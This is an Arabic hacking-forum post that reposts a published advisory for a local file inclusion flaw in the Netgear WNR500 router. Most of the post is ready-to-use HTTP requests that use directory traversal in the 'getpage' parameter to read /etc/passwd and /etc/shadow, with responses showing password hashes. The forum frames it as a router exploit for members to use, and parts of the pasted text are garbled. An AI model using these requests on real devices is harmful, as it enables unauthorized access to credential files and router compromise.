ثغرة Netgear Wireless Router WNR500 Local File Inclusion

ثغرات المواقع والسيرفرات وكيفية استغلالها وشروحات مع تطبيقات عملية على استغلال الثغرات وتطبيقها


إضافة رد
قديم 11-22-2014
  #1
Cwne
Administrator
 الصورة الرمزية Cwne
 
تاريخ التسجيل: Mar 2004
الدولة: Palestine
المشاركات: 418
شكراً: 283
تم شكره 96 مرة في 84 مشاركة
افتراضي ثغرة Netgear Wireless Router WNR500 Local File Inclusion



السلام عليكم ورحمة الله وبركاته شباب
الكثير منا من يريد ثغرات في الراوترات
جبت لكم ثغرة في راوتر Netgear WNR500
نازلة بتاريخ اليوم

شرح الثغرة

كود PHP:
Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit
 
 
Vendor
NETGEAR
Product web page
http://www.netgear.com
Affected versionWNR500 (firmware1.0.7.2)
 
SummaryThe NETGEAR compact N150 classic wireless router (WNR500improves
your legacy Wireless
-G networkIt is a simplesecure way to share your
Internet connection 
and allows you to easily surf the Internet, use email,
and 
have online chatsThe quickCD-less setup can be done through a web
browser
The smallefficient design fits perfectly into your home.
 
DescThe router suffers from an authenticated file inclusion vulnerability
(LFIwhen input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to 
include filesThis can be exploited
to 
include files from local resources with directory traversal attacks.
 
Tested onmini_httpd/1.19 19dec2003
 
 
Vulnerability discovered by Gjoko 
'LiquidWorm' Krstic
                            
@zeroscience
 
 
Advisory ID
ZSL-2014-5208
Advisory URL
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php
 
 
16.11.2014
 
--
 
 
=============================================================
 
GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
Host
192.168.1.1:8080
User
-AgentMozilla/5.0 (Windows NT 6.1WOW64rv:32.0Gecko/20100101 Firefox/32.0
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
 
---
 
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
 
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
 
 
= 2 =============================================================
 
GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8
Accept
-Languageen-US,en;q=0.5
Accept
-Encodinggzipdeflate
Cookie
sessionid=7dc3268bauth=okexpires=Sun15-May-2012 01:45:46 GMTsessionid=7dc3268bauth=okexpires=Mon31-Jan-2050 16:00:00 GMTlanguage=en_us
Authorization
Basic YWRtaW46cGFzc3dvcmQ=
Connectionkeep-alive
 
---
 
HTTP/1.0 200 OK
Content
-typetext/html
Cache
-Controlno-cache
set
-cookiesessionid=7dc3268b;
set-cookieauth=ok;
set-cookieexpires=Sun15-May-2012 01:45:46 GMT;
 
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: 

ومن هنا في 1337day
http://1337day.com/exploit/22908
__________________
!! لآ تتعلم لتخترق ~ إخترق لتتعلم !!
Cwne غير متواجد حالياً  
رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة Local File Include جديده virus_of_jordan عالم الثغرات - Vulnerabilities World 1 06-08-2011 12:19 PM
استفسار بخصوص local file incluser taalloo Recycle bin 0 10-26-2009 10:23 AM
remote file inclusion AlexX اسأل ونحن نجيب 2 08-29-2009 04:19 PM
SunLight CMS 5.3 <= Remote File Inclusion Vulnerability Taxi to H£LL عالم الثغرات - Vulnerabilities World 8 04-08-2009 01:09 PM
php-Agenda 2.2.4 (index.php page) Local File Inclusion Vulnerability lave84 عالم الثغرات - Vulnerabilities World 6 12-12-2008 08:17 PM


الساعة الآن 03:17 AM.